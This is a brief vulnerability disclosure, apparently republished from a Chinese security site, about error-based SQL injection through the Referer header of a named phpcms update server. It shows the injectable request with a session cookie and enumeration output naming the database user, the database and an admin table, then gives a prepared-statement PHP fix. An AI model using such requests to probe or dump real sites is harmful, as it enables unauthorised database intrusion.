
MySQL error-based SQL injection on a phpcms site

15-08-08

The Referer header is injectable:
 

GET /index.php HTTP/1.1
Referer: 123*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017
Host: update.phpcms.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

 

current user:    'phpcms_cn_user@%'
current database:    'phpcms_cn'
Database: phpcms_cn
[200 tables]


 

Database: phpcms_cn
Table: v9_admin
[3 entries]

 

Solution:

Filter the parameters
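
One way to apply the fix above, as an added example that is not phpcms code: the Referer value is validated, passed to the database only as a bound parameter, and any database error is logged server-side instead of being returned, since error-based injection depends on those messages reaching the client. The `referer_log` table, the function names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Added example: referer_log and these function names are hypothetical.
function open_db(): PDO {
    // In-memory SQLite keeps this offline; with MySQL only the DSN changes.
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE referer_log (id INTEGER PRIMARY KEY, referer TEXT, hit_time INTEGER)');
    return $pdo;
}

// The header is client-controlled: bound its length and accept only http(s) URLs.
function clean_referer(?string $raw): ?string {
    if ($raw === null || $raw === '' || strlen($raw) > 2048 || preg_match('/[\x00-\x1f\x7f]/', $raw) === 1) {
        return null; // missing, oversized, or containing control characters
    }
    $scheme = parse_url($raw, PHP_URL_SCHEME);
    return (is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true)) ? $raw : null;
}

function log_referer(PDO $pdo, ?string $raw): void {
    $referer = clean_referer($raw);
    // The value is sent as a bound parameter, never concatenated into the SQL text.
    $stmt = $pdo->prepare(
        'INSERT INTO referer_log (referer, hit_time) VALUES (:referer, :hit_time)');
    $stmt->bindValue(':referer', $referer,
        $referer === null ? PDO::PARAM_NULL : PDO::PARAM_STR);
    $stmt->bindValue(':hit_time', time(), PDO::PARAM_INT);
    $stmt->execute();
}

// Constructed inputs: the request's value, a URL containing a quote, an ordinary URL.
$pdo = open_db();
foreach (['123*', "http://example.com/a'b", 'https://example.com/news/1'] as $header) {
    try {
        log_referer($pdo, $header);
    } catch (PDOException $e) {
        // Keep the detail in the server log; never return database errors to the client.
        error_log('referer logging failed: ' . $e->getMessage());
    }
}
foreach ($pdo->query('SELECT id, referer FROM referer_log') as $row) {
    var_dump($row);
}
```

With the MySQL PDO driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the statement is prepared on the server.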


Copyright: 红黑联盟, dedicated to being a practical IT learning site